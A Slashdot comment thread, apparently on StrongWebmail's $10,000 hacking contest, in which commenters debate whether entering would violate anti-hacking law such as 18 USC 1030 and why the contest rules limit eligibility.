Gezzzzz come on now... If you try and claim the 10 grand you're going to get 30 years in federal prison.....
No wonder they didn't think anyone would try for the 10 grand.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230133)

Taxed? - Hacking? - Donno it might be now...

wait wait wait... are they saying VOID where the proceeds of the contest are TAXED? That would be everywhere in the US!

Re:Point of Order... (1)

benjamindees (441808) | more than 5 years ago | (#28230237)

The DMCA is probably the only law broad enough to include hacking that is expressly permitted. And, even then, calendar entries probably don't rise to the level of copyright protection. So I don't see what law would have been broken.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230285)

Are you a lawyer? I'm not but I am pretty sure there are anti-hacking laws... Where is a good lawyer when you need one.... for free.... at 1am on a Friday night.... while in jail....

Someone needs to summon that NC-lawyer guy from his bed... Maybe prank call him and tell him the RIAA wants to settle to get him up on here to chime in.

I read over their rules and it was extremely iffy looking to me... But I'm no Hacker, I mean lawyer so ehh...

Anyway this story is 1am3, I will never use this company's product as I prefer an extremely old alpha copy of qmail and outlook express.

Re:Point of Order... (1)

ae1294 (1547521) | more than 5 years ago | (#28230351)

Anyway this story is 1am3, I will never use this company's product as I prefer an extremely old alpha copy of qmail and outlook express.

If you where wondering... I was taut to rename all of my executable's on my server and replace them with very small shell scripts that mock all the hackers who gain root just before kill -9'ing their pids with a very meaty grep command...

They think it's some sort of "chat with lisa" joke type server.. they are wrong... Dead Wrong...

Re:Point of Order... (3, Informative)

pavon (30274) | more than 5 years ago | (#28230603)

There are anti-hacker laws, but they generally read along the lines of

Whoever having knowingly accessed a computer without authorization or exceeding authorized access...
Whoever intentionally, without authorization to access any nonpublic computer ...
Whoever knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access

(From 18.USC 1030 [cornell.edu] , the law Lori Drew was charged with)

Darren Berkovitz gave explicit permission when he announced this contest, so they had authorization to attempt to gain access by any means allowed by the rules. The only restrictions given were that you had to register first, and you couldn't get help from a StrongWebmail employee.

The rest of the rules looked innocuous to me. Most of it was standard broiler-plate which is required by law for any contest - a cereal box prize will have the same language. The last paragraph of the third section was all just Disclaimers of Liabilities - we aren't responsible for network congestion if someone tries to DoS us to win the prize, we aren't responsible if you download some script-kiddy software to use in the competition and it screws up your computer, etc.

If you did clearly break the rules that you could be charged under 18.USC 1030 as the access was unauthorized, knowing (you agreed to the rules), and fraudulent (you were attempting to cheat them out of prize money), and crossed state lines. But they weren't tricky rules to follow.

Re:Point of Order... (1)

amicusNYCL (1538833) | more than 5 years ago | (#28230755)

Only open to US residents? - SURE, "all" the best hackers and US born.
18 Years of Age. - O yes, for "all" the best hackers are 18 and older because they have girlfriends, jobs and a shit-ton more to loose.

They have to limit their liability by only allowing American adults, a minor can't enter into a contract so there's no point in even allowing them to compete. They probably need to be American just in case the company decides to sue them. As for hacking being illegal, it's not exactly illegal when you have permission to do it. The definition of hacking includes lack of authorization to do what you're doing. If you have authorization, legally speaking you're not hacking.

Re:Point of Order... (1, Informative)

Anonymous Coward | more than 5 years ago | (#28230849)

For the love of anything anyone considers holy, don't mod this "Insightful."

Funny perhaps, in a sort of tongue-in-cheek way...but seriously, all of those restrictions are generally required for any kind of contest with a large cash reward. It's just to remove any liability from the company for refusing would-be contest winners that are not permitted through laws, or for any actions of individuals illegally participating.

Hacking (0)

Anonymous Coward | more than 5 years ago | (#28230249)

Hacking by definition is gaining "unauthorized access". If you are providing a reward, rules, and encourage people to participate (as in a contest), does it really count as unauthorized access?

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>